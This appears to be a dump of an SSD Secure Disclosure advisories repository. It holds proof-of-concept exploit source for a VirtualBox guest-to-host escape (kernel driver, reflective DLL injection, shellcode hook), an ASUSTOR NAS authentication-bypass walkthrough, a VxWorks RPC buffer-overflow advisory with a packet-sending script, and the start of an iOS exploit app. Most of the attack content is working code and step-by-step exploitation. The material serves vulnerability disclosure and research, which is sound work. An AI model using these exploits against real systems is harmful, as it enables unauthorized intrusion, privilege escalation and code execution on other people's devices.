74 |
75 | [vrdpexploit_Device.NT.Wdf]
76 | KmdfService = vrdpexploit, vrdpexploit_wdfsect
77 | [vrdpexploit_wdfsect]
78 | KmdfLibraryVersion = $KMDFVERSION$
79 |
80 | [Strings]
81 | SPSVCINST_ASSOCSERVICE= 0x00000002
82 | ManufacturerName="" ;TODO: Replace with your manufacturer name
83 | ClassName="Samples" ; TODO: edit ClassName
84 | DiskName = "vrdpexploit Installation Disk"
85 | vrdpexploit.DeviceDesc = "vrdpexploit Device"
86 | vrdpexploit.SVCDESC = "vrdpexploit Service"
87 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit/vrdpexploit/vrdpexploit.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDll.c:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // This is a stub for the actuall functionality of the DLL.
3 | //===============================================================================================//
4 | #include "ReflectiveLoader.h"
5 |
6 | // Note: REFLECTIVEDLLINJECTION_VIA_LOADREMOTELIBRARYR and REFLECTIVEDLLINJECTION_CUSTOM_DLLMAIN are
7 | // defined in the project properties (Properties->C++->Preprocessor) so as we can specify our own
8 | // DllMain and use the LoadRemoteLibraryR() API to inject this DLL.
9 |
10 | // You can use this value as a pseudo hinstDLL value (defined and set via ReflectiveLoader.c)
11 | extern HINSTANCE hAppInstance;
12 | extern VOID HijackHostId(PVOID launcherProcessMemory);
13 | //===============================================================================================//
14 | BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD dwReason, LPVOID lpReserved)
15 | {
16 | BOOL bReturnValue = TRUE;
17 | switch (dwReason)
18 | {
19 | case DLL_QUERY_HMODULE:
20 | if (lpReserved != NULL)
21 | *(HMODULE *)lpReserved = hAppInstance;
22 | break;
23 | case DLL_PROCESS_ATTACH:
24 | hAppInstance = hinstDLL;
25 | //MessageBoxA(NULL, "Hello from DllMain!", "Reflective Dll Injection", MB_OK);
26 | HijackHostId(lpReserved);
27 | break;
28 | case DLL_PROCESS_DETACH:
29 | case DLL_THREAD_ATTACH:
30 | case DLL_THREAD_DETACH:
31 | break;
32 | }
33 | return bReturnValue;
34 | }
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/ReflectiveDllInjection.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include
33 |
34 | // we declare some common stuff in here...
35 |
36 | #define DLL_QUERY_HMODULE 6
37 |
38 | #define DEREF( name )*(UINT_PTR *)(name)
39 | #define DEREF_64( name )*(DWORD64 *)(name)
40 | #define DEREF_32( name )*(DWORD *)(name)
41 | #define DEREF_16( name )*(WORD *)(name)
42 | #define DEREF_8( name )*(BYTE *)(name)
43 |
44 | typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID);
45 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
46 |
47 | #define DLLEXPORT __declspec( dllexport )
48 |
49 | //===============================================================================================//
50 | #endif
51 | //===============================================================================================//
52 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/Shellcode.asm:
--------------------------------------------------------------------------------
1 | PUBLIC Shellcode
2 |
3 | EXTERN gHostId: DWORD
4 | EXTERN RestoreBytes: PROC
5 |
6 | .CODE
7 |
8 | Shellcode PROC
9 |
10 | ; We should preserve all the registers because it's not known
11 | ; what of them will be used in RestoreBytes()
12 | push rax
13 | push rbx
14 | push rcx
15 | push rdx
16 | push rsi
17 | push rdi
18 | push r8
19 | push r9
20 | push r10
21 | push r11
22 | push r12
23 | push r13
24 | push r14
25 | push r15
26 |
27 | ; IDirect3DSurface9* pSrcSurfIf = [rsp + 0260h]
28 | ; We add 8 to because the shellcode is call'ed by the patch
29 | ; We also add 112 to account all the push'es (8 * 14)
30 | mov rax, qword ptr [rsp + 0260h + 08h + 070h];
31 |
32 | ; wined3d_surface* surface = ((d3d9_surface*)pSrcSurfIf)->wined3d_surface
33 | mov rax, qword ptr [rax + 010h]
34 |
35 | ; uint32_t hostId = surface->texture_name
36 | mov eax, dword ptr [rax + 0F4h]
37 |
38 | ; Save Host ID
39 | mov dword ptr [gHostId], eax
40 |
41 | ; Replace the patch with original bytes so the shellcode will not be called anymore
42 | call RestoreBytes
43 |
44 | pop r15
45 | pop r14
46 | pop r13
47 | pop r12
48 | pop r11
49 | pop r10
50 | pop r9
51 | pop r8
52 | pop rdi
53 | pop rsi
54 | pop rdx
55 | pop rcx
56 | pop rbx
57 | pop rax
58 |
59 | ret
60 |
61 | Shellcode ENDP
62 |
63 | END
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Source Files
20 |
21 |
22 | Source Files
23 |
24 |
25 | Source Files
26 |
27 |
28 | Source Files
29 |
30 |
31 | Source Files
32 |
33 |
34 |
35 |
36 | Header Files
37 |
38 |
39 | Header Files
40 |
41 |
42 |
43 |
44 | Source Files
45 |
46 |
47 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/hostid_hijacker/hostid_hijacker.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher.sln:
--------------------------------------------------------------------------------
1 |
2 | Microsoft Visual Studio Solution File, Format Version 12.00
3 | # Visual Studio 15
4 | VisualStudioVersion = 15.0.27428.2005
5 | MinimumVisualStudioVersion = 10.0.40219.1
6 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "vrdpexploit_launcher", "vrdpexploit_launcher\vrdpexploit_launcher.vcxproj", "{BE8BC74D-5981-4C66-8332-0C79ACE67A15}"
7 | EndProject
8 | Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "hostid_hijacker", "hostid_hijacker\hostid_hijacker.vcxproj", "{0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}"
9 | EndProject
10 | Global
11 | GlobalSection(SolutionConfigurationPlatforms) = preSolution
12 | Debug|x64 = Debug|x64
13 | Debug|x86 = Debug|x86
14 | Release|x64 = Release|x64
15 | Release|x86 = Release|x86
16 | EndGlobalSection
17 | GlobalSection(ProjectConfigurationPlatforms) = postSolution
18 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.ActiveCfg = Debug|x64
19 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x64.Build.0 = Debug|x64
20 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.ActiveCfg = Debug|Win32
21 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Debug|x86.Build.0 = Debug|Win32
22 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.ActiveCfg = Release|x64
23 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x64.Build.0 = Release|x64
24 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.ActiveCfg = Release|Win32
25 | {BE8BC74D-5981-4C66-8332-0C79ACE67A15}.Release|x86.Build.0 = Release|Win32
26 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.ActiveCfg = Debug|x64
27 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x64.Build.0 = Debug|x64
28 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.ActiveCfg = Debug|Win32
29 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Debug|x86.Build.0 = Debug|Win32
30 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.ActiveCfg = Release|x64
31 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x64.Build.0 = Release|x64
32 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.ActiveCfg = Release|Win32
33 | {0414DEEB-8C9A-4AA3-B77E-BFDB82DC9E4C}.Release|x86.Build.0 = Release|Win32
34 | EndGlobalSection
35 | GlobalSection(SolutionProperties) = preSolution
36 | HideSolutionNode = FALSE
37 | EndGlobalSection
38 | GlobalSection(ExtensibilityGlobals) = postSolution
39 | SolutionGuid = {6212740A-BF6E-48E0-9BD4-FC50CE875A0E}
40 | EndGlobalSection
41 | EndGlobal
42 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/GetProcAddressR.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
29 | #define _REFLECTIVEDLLINJECTION_GETPROCADDRESSR_H
30 | //===============================================================================================//
31 | #include "ReflectiveDLLInjection.h"
32 |
33 | FARPROC WINAPI GetProcAddressR(HANDLE hModule, LPCSTR lpProcName);
34 | //===============================================================================================//
35 | #endif
36 | //===============================================================================================//
37 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/LoadLibraryR.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
29 | #define _REFLECTIVEDLLINJECTION_LOADLIBRARYR_H
30 | //===============================================================================================//
31 | #include "ReflectiveDLLInjection.h"
32 |
33 | DWORD GetReflectiveLoaderOffset(VOID * lpReflectiveDllBuffer);
34 |
35 | HMODULE WINAPI LoadLibraryR(LPVOID lpBuffer, DWORD dwLength);
36 |
37 | HANDLE WINAPI LoadRemoteLibraryR(HANDLE hProcess, LPVOID lpBuffer, DWORD dwLength, LPVOID lpParameter);
38 |
39 | //===============================================================================================//
40 | #endif
41 | //===============================================================================================//
42 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ssd-secure-disclosure/advisories/bccd87bb60bf8ef002f3473bff63f338adb349eb/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Main.c
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/Process.c:
--------------------------------------------------------------------------------
1 | #include
2 | #include
3 | #include
4 |
5 | DWORD
6 | GetPidByName(PCHAR name) {
7 | PROCESSENTRY32 entry;
8 | entry.dwSize = sizeof(PROCESSENTRY32);
9 |
10 | HANDLE snapshot = CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
11 | if (Process32First(snapshot, &entry)) {
12 | do {
13 | if (!_stricmp(entry.szExeFile, name)) {
14 | DWORD pid = entry.th32ProcessID;
15 | printf("[*] PID: %d\n", pid);
16 | return pid;
17 | }
18 | } while (Process32Next(snapshot, &entry));
19 | }
20 |
21 | printf("[-] Failed to get PID of %s\n", name);
22 | return 0;
23 | }
24 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/ReflectiveDLLInjection.h:
--------------------------------------------------------------------------------
1 | //===============================================================================================//
2 | // Copyright (c) 2012, Stephen Fewer of Harmony Security (www.harmonysecurity.com)
3 | // All rights reserved.
4 | //
5 | // Redistribution and use in source and binary forms, with or without modification, are permitted
6 | // provided that the following conditions are met:
7 | //
8 | // * Redistributions of source code must retain the above copyright notice, this list of
9 | // conditions and the following disclaimer.
10 | //
11 | // * Redistributions in binary form must reproduce the above copyright notice, this list of
12 | // conditions and the following disclaimer in the documentation and/or other materials provided
13 | // with the distribution.
14 | //
15 | // * Neither the name of Harmony Security nor the names of its contributors may be used to
16 | // endorse or promote products derived from this software without specific prior written permission.
17 | //
18 | // THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR
19 | // IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND
20 | // FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR
21 | // CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
22 | // CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
23 | // SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
24 | // THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR
25 | // OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
26 | // POSSIBILITY OF SUCH DAMAGE.
27 | //===============================================================================================//
28 | #ifndef _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
29 | #define _REFLECTIVEDLLINJECTION_REFLECTIVEDLLINJECTION_H
30 | //===============================================================================================//
31 | #define WIN32_LEAN_AND_MEAN
32 | #include
33 |
34 | // we declare some common stuff in here...
35 |
36 | #define DLL_METASPLOIT_ATTACH 4
37 | #define DLL_METASPLOIT_DETACH 5
38 | #define DLL_QUERY_HMODULE 6
39 |
40 | #define DEREF( name )*(UINT_PTR *)(name)
41 | #define DEREF_64( name )*(DWORD64 *)(name)
42 | #define DEREF_32( name )*(DWORD *)(name)
43 | #define DEREF_16( name )*(WORD *)(name)
44 | #define DEREF_8( name )*(BYTE *)(name)
45 |
46 | typedef ULONG_PTR(WINAPI * REFLECTIVELOADER)(VOID);
47 | typedef BOOL(WINAPI * DLLMAIN)(HINSTANCE, DWORD, LPVOID);
48 |
49 | #define DLLEXPORT __declspec( dllexport )
50 |
51 | //===============================================================================================//
52 | #endif
53 | //===============================================================================================//
54 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/_Constants.c:
--------------------------------------------------------------------------------
1 | #include
2 |
3 | /******************************************************************************
4 | * Exploit's contants - if something not works, consider to review them
5 | ******************************************************************************/
6 |
7 | /********** Launcher constants **********/
8 |
9 | CHAR gDriverName[] = "vrdpexploit.sys";
10 | CHAR gDeviceName[] = "\\??\\vrdpexploit";
11 | DWORD gIoctlEscalate = CTL_CODE(0x8000, 0x800, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002000 */
12 | DWORD gIoctlExploit = CTL_CODE(0x8000, 0x801, METHOD_BUFFERED, FILE_ANY_ACCESS); /* 0x80002004 */
13 |
14 | CHAR gDwmName[] = "dwm.exe";
15 | CHAR gHijackerName[] = "hostid_hijacker.dll";
16 | CHAR gSuspendCommand[] = "pssuspend64.exe -nobanner dwm.exe";
17 | CHAR gResumeCommand[] = "pssuspend64.exe -nobanner -r dwm.exe";
18 |
19 | /********** Host ID Hijacker constants **********/
20 |
21 | CHAR launcherProcessName[] = "vrdpexploit_launcher.exe";
22 |
23 | BYTE gPatch[] =
24 | "\xE8\x00\x00\x00\x00" // call $5
25 | "\x58" // pop rax
26 | "\x48\x83\xE8\x05" // sub rax, 5
27 | "\x50" // push rax
28 | "\x48\xB8\x41\x41\x41\x41\x41\x41\x41\x41" // mov rax, 0x4141414141414141
29 | "\x50" // push rax
30 | "\xC3"; // ret
31 |
32 | // Workaround to define a "constant" instead of #define PATCH_SIZE
33 | // in several files.
34 | enum patch_size {
35 | patchSize = 23,
36 | };
37 | enum patch_size gPatchSize = patchSize;
38 |
39 | // Offset from gPatch to a shellcode address of command "mov rax, ..."
40 | ULONGLONG gPatchShellcodeAddrOffset = ???; // Removed for the sake of PoC
41 |
42 | // Offset inside vboxWddmDDevPresent where gPatch will be copied
43 | ULONGLONG gPatchOffset = ???; // Removed for the sake of PoC
44 |
45 | BYTE gSavedBytes[patchSize];
46 |
47 | const DWORD gLastValidHostId = 100;
48 |
49 | /******************************************************************************
50 | * End of exploit's contants
51 | ******************************************************************************/
52 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.filters:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 | {4FC737F1-C7A5-4376-A066-2A32D752A2FF}
6 | cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx
7 |
8 |
9 | {93995380-89BD-4b04-88EB-625FBE52EBFB}
10 | h;hh;hpp;hxx;hm;inl;inc;ipp;xsd
11 |
12 |
13 | {67DA6AB6-F800-4c08-8B7A-83BB121AAD01}
14 | rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms
15 |
16 |
17 |
18 |
19 | Header Files
20 |
21 |
22 | Header Files
23 |
24 |
25 |
26 |
27 | Source Files
28 |
29 |
30 | Source Files
31 |
32 |
33 | Header Files
34 |
35 |
36 | Source Files
37 |
38 |
39 | Source Files
40 |
41 |
42 | Source Files
43 |
44 |
45 | Source Files
46 |
47 |
48 | Source Files
49 |
50 |
51 |
--------------------------------------------------------------------------------
/SSD Advisory - 3736/exploit/poc_vrdpexploit_launcher/vrdpexploit_launcher/vrdpexploit_launcher.vcxproj.user:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
--------------------------------------------------------------------------------
/SSD Advisory - 3747/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | An ASUSTOR NAS or network attached storage is “a computer appliance built from the ground up for storing and serving files. It attaches directly to a network, allowing those on the network to access and share files from a central location”. In the following advisory we will discuss a vulnerability found inside ASUSTOR NAS which lets anonymous attackers bypass authentication requirement of the product.
3 |
4 | **Credit**
5 | An independent security researcher, Ahmed Y. Elmogy, has reported this vulnerability to Beyond Security’s SecuriTeam Secure Disclosure program.
6 |
7 | **Affected systems**
8 | ASUSTOR NAS devices running ADM version 3.0.5.RDU1 and prior
9 |
10 | **Vulnerability Details**
11 | The vulnerability lies in the web interface of ASUSTOR NAS, in the file located in /initial/index.cgi, which responsible for initializing the device with your ASUSTOR ID. The problem is that this file is always available even after the first initialization, and it doesn’t require any authentication at all.
12 | So by abusing /initial/index.cgi?act=register, you’ll be logged in with the administrator privileges without any kind of authentication.
13 |
14 | **How to Exploit**
15 | Visit:
16 | `http://:/initial/index.cgi?act=register`
17 | (Port will probably be 8800)
18 | Check “Register later”, click on next, and press the “Start” button. You’ll be redirected to /portal/index.cgi with a sid parameter, bypassing the authentication, and accessing the web interface with admin privileges.
19 |
--------------------------------------------------------------------------------
/SSD Advisory - 3904/readme.md:
--------------------------------------------------------------------------------
1 | **Vulnerability Summary**
2 | The following advisory describes a vulnerability found in the Remote Procedure Call (RPC) component of the VxWorks real-time Opearting System, which suffers from a buffer overflow, this buffer overflow can be exploited to cause the component to execute arbitrary code.
3 |
4 | **CVE**
5 | CVE-2019-9865
6 |
7 | **Credit**
8 | An independent Security Researcher, Yu Zhou, has reported this vulnerability to SSD Secure Disclosure program.
9 |
10 | **Affected systems**
11 | VxWorks OS version 6.6
12 |
13 | **Vendor Response**
14 | “We’ve gone through our supported versions of VxWorks and found the versions affected are 6.9 before 6.9.1. We released the update to our customers today. Except in special circumstances, we only release statements and fixes for supported products. We know you found this vulnerability in an unsupported version of VxWorks. We won’t have a code update for that, but a mitigation is to disable CONFIG_RPC. This will be published in NVD as CVE-2019-9865. It should be public shortly. Thank you for working with us to resolve this problem. We hope to work with you in the future if you have found other vulnerabilities, and we may have other questions for you.”
15 |
16 | **Vulnerability Details**
17 | As previously mentioned, the vulnerability is inside the RPC component. The vulnerable function which contains the buffer overflow is _svcauth_unix. At _svcauth_unix + 0x67, will get the value 0xffffffff from the malicious packet (content will be viewed later).
18 |
19 |
20 |
21 | Afterwards, in the cmp eax, 0FFh it will check whether the value (packet content size) is greater than 255 without considering the option of a negative value. The value 0xffffffff is used as the third parameter (nbytes) of the bcopy function, which will finaly cause a buffer overflow.
22 |
23 |
24 |
25 | This is the packet that will be sent to the RPC Service:
26 |
27 |
28 |
29 | **Exploit**
30 | ```python
31 | import socket
32 |
33 | host = "192.168.15.199"
34 | rpcPort = 111
35 |
36 | f = open("pkt", 'rb') # pkt is the file which contains the payload to send.
37 | data = f.read()
38 | f.close()
39 |
40 | sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
41 | sock.connect((host, rpcPort))
42 | sock.send(data)
43 | sock.close()
44 | ```
45 |
46 |
47 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/AppDelegate.h:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.h
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import
10 |
11 | @interface AppDelegate : UIResponder
12 |
13 | @property (strong, nonatomic) UIWindow *window;
14 |
15 |
16 | @end
17 |
18 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/AppDelegate.m:
--------------------------------------------------------------------------------
1 | //
2 | // AppDelegate.m
3 | // powend
4 | //
5 | // Created by simo on 30/08/2018.
6 | // Copyright © 2018 simo ghannam. All rights reserved.
7 | //
8 |
9 | #import "AppDelegate.h"
10 | #import "code.h"
11 |
12 | @interface AppDelegate ()
13 |
14 | @end
15 |
16 | @implementation AppDelegate
17 |
18 |
19 | - (BOOL)application:(UIApplication *)application didFinishLaunchingWithOptions:(NSDictionary *)launchOptions {
20 | // Override point for customization after application launch.
21 | //do_powend();
22 | start_exploit();
23 | return YES;
24 | }
25 |
26 |
27 | - (void)applicationWillResignActive:(UIApplication *)application {
28 | // Sent when the application is about to move from active to inactive state. This can occur for certain types of temporary interruptions (such as an incoming phone call or SMS message) or when the user quits the application and it begins the transition to the background state.
29 | // Use this method to pause ongoing tasks, disable timers, and invalidate graphics rendering callbacks. Games should use this method to pause the game.
30 | }
31 |
32 |
33 | - (void)applicationDidEnterBackground:(UIApplication *)application {
34 | // Use this method to release shared resources, save user data, invalidate timers, and store enough application state information to restore your application to its current state in case it is terminated later.
35 | // If your application supports background execution, this method is called instead of applicationWillTerminate: when the user quits.
36 | }
37 |
38 |
39 | - (void)applicationWillEnterForeground:(UIApplication *)application {
40 | // Called as part of the transition from the background to the active state; here you can undo many of the changes made on entering the background.
41 | }
42 |
43 |
44 | - (void)applicationDidBecomeActive:(UIApplication *)application {
45 | // Restart any tasks that were paused (or not yet started) while the application was inactive. If the application was previously in the background, optionally refresh the user interface.
46 | }
47 |
48 |
49 | - (void)applicationWillTerminate:(UIApplication *)application {
50 | // Called when the application is about to terminate. Save data if appropriate. See also applicationDidEnterBackground:.
51 | }
52 |
53 |
54 | @end
55 |
--------------------------------------------------------------------------------
/SSD Advisory - 3944/powend (code)/Assets.xcassets/AppIcon.appiconset/Contents.json:
--------------------------------------------------------------------------------
1 | {
2 | "images" : [
3 | {
4 | "idiom" : "iphone",
5 | "size" : "20x20",
6 | "scale" : "2x"
7 | },
8 | {
9 | "idiom" : "iphone",
10 | "size" : "20x20",
11 | "scale" : "3x"
12 | },
13 | {
14 | "idiom" : "iphone",
15 | "size" : "29x29",
16 | "scale" : "2x"
17 | },
18 | {
19 | "idiom" : "iphone",
20 | "size" : "29x29",
21 | "scale" : "3x"
22 | },
23 | {
